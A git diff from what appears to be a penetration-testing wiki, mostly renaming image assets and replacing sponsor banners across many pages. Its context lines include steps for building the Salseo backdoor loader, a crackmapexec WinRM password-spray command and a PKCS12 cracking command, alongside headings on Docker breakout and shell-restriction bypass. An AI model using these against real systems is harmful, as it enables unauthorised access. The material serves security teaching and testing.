diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..e70bceed6
Binary files /dev/null and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index e70bceed6..2173ed0a4 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png
index 2173ed0a4..53e9f7c1f 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png
index 53e9f7c1f..0ea1b8586 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png
index 0ea1b8586..b38f1e7c3 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1).png
index b38f1e7c3..0e554c193 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png
index 0e554c193..a8cfa5b77 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png
index a8cfa5b77..33c23d55b 100644
Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index 33c23d55b..bedca8e18 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index bedca8e18..a0a303a29 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..eaa792ed6
Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png
index eaa792ed6..eb7611c98 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png
index eb7611c98..4ede9266b 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png
index 4ede9266b..d7789e602 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png
index d7789e602..ca4b6651b 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1).png
index ca4b6651b..0330f840b 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1).png
index 0330f840b..8190e06a7 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png
index 8190e06a7..0c49287b0 100644
Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 0c49287b0..bedca8e18 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index bedca8e18..611702103 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..455fbb8b7
Binary files /dev/null and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png
index 455fbb8b7..6874f9c86 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png
index 6874f9c86..38b71f3d4 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png
index 38b71f3d4..7dcdeb084 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png
index 7dcdeb084..865dc4ae4 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1).png
index 865dc4ae4..0d52048cb 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png
index 0d52048cb..b98c9fbbc 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png
index b98c9fbbc..78abb7891 100644
Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 78abb7891..cdd56bb93 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index cdd56bb93..f406f4410 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..2fde683ec
Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png
index 2fde683ec..ea50c990a 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png
index ea50c990a..bc4b76df1 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png
index bc4b76df1..8cd1f020d 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png
index 8cd1f020d..c4dc34691 100644
Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png
index c4dc34691..59ecb25fa 100644
Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 59ecb25fa..0a0d96518 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 0a0d96518..f0efd5ebd 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index a73521062..358f92380 100644
--- a/README.md
+++ b/README.md
@@ -32,7 +32,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [RootedCON](https://www.rootedcon.com/)
-
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
@@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Intigriti](https://www.intigriti.com)
-
+
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
@@ -50,7 +50,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
index 15a213697..453450c72 100644
--- a/backdoors/salseo.md
+++ b/backdoors/salseo.md
@@ -99,17 +99,17 @@ Open the SalseoLoader project using Visual Studio.
### Add before the main function: \[DllExport]
-![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Install DllExport for this project
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
-![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
-![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1).png>)
+![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
diff --git a/cryptography/certificates.md b/cryptography/certificates.md
index b7ff0623b..3dd3f4849 100644
--- a/cryptography/certificates.md
+++ b/cryptography/certificates.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -197,7 +197,7 @@ openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md
index 895626cf3..495f7d8cd 100644
--- a/forensics/basic-forensic-methodology/linux-forensics.md
+++ b/forensics/basic-forensic-methodology/linux-forensics.md
@@ -1,6 +1,6 @@
# Linux Forensics
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -161,7 +161,7 @@ icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -224,7 +224,7 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
find /sbin/ –exec rpm -qf {} \; | grep "is not"
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -365,7 +365,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -451,7 +451,7 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index 3fa478038..64995552a 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -231,7 +231,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index 1b35e95aa..e1d4b0bb0 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -268,7 +268,7 @@ Opera **stores browser history and download data in the exact same format as Goo
* **Browser’s built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
* **fraud\_protection\_enabled** should be **true**
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 675204742..ce7c1d8bb 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -113,7 +113,7 @@ Other tables inside this database contain more interesting information:
* **deleted\_fields**: Dropbox deleted files
* **date\_added**
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 5ce9d73eb..daa906b0b 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -92,7 +92,7 @@ Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automat
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index a2588dc2e..1865758bb 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md
index 68499275a..69626acee 100644
--- a/generic-methodologies-and-resources/brute-force.md
+++ b/generic-methodologies-and-resources/brute-force.md
@@ -1,6 +1,6 @@
# Brute Force - CheatSheet
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -106,7 +106,7 @@ Finished in 0.920s.
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -466,7 +466,7 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
crackmapexec winrm -d -u usernames.txt -p passwords.txt
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -668,7 +668,7 @@ zip -r file.xls .
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -829,7 +829,7 @@ Cracking Common Application Hashes
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/README.md b/generic-methodologies-and-resources/python/README.md
index 64cd97197..a46305264 100644
--- a/generic-methodologies-and-resources/python/README.md
+++ b/generic-methodologies-and-resources/python/README.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -28,7 +28,7 @@ Get Access Today:
* [**Basic python web requests syntax**](web-requests.md)
* [**Basic python syntax and libraries**](basic-python.md)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/venv.md b/generic-methodologies-and-resources/python/venv.md
index 848b6c12b..7b7d9cb92 100644
--- a/generic-methodologies-and-resources/python/venv.md
+++ b/generic-methodologies-and-resources/python/venv.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -39,7 +39,7 @@ pip3 install wheel
inside the virtual environment
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/web-requests.md b/generic-methodologies-and-resources/python/web-requests.md
index 1eccc22b7..3a52385eb 100644
--- a/generic-methodologies-and-resources/python/web-requests.md
+++ b/generic-methodologies-and-resources/python/web-requests.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -119,7 +119,7 @@ term = Terminal()
term.cmdloop()
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md
index 30298ab86..b28fe2a6f 100644
--- a/generic-methodologies-and-resources/search-exploits.md
+++ b/generic-methodologies-and-resources/search-exploits.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -62,7 +62,7 @@ You can also search in vulners database: [https://vulners.com/](https://vulners.
This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md
index 878bcbf77..d8f5ccf18 100644
--- a/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/README.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -137,7 +137,7 @@ When I changed Docker host, I had to move the root keys and repository keys to o
***
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -450,7 +450,7 @@ If you have access to the docker socket or have access to a user in the **docker
* [https://en.wikipedia.org/wiki/Linux\_namespaces](https://en.wikipedia.org/wiki/Linux\_namespaces)
* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
index 1984e536a..4ab69bca0 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -521,7 +521,7 @@ cat /proc/self/status | grep CapEff
The second technique explained in the post [https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files).
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -663,7 +663,7 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
* [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md
index 691e985b2..3c6860ab1 100644
--- a/linux-hardening/useful-linux-commands/README.md
+++ b/linux-hardening/useful-linux-commands/README.md
@@ -1,6 +1,6 @@
# Useful Linux Commands
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -141,7 +141,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
7z l file.zip
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -314,7 +314,7 @@ iptables -P OUTPUT ACCEPT
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
index cefc72b6d..6fc976b3e 100644
--- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -366,7 +366,7 @@ If you are inside a filesystem with the **read-only and noexec protections** or
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md
index d42db0675..2e1b6fe2b 100644
--- a/macos-hardening/macos-auto-start-locations.md
+++ b/macos-hardening/macos-auto-start-locations.md
@@ -12,10 +12,31 @@
-Here are locations on the system that could lead to the **execution** of a binary **without** **user** **interaction**.
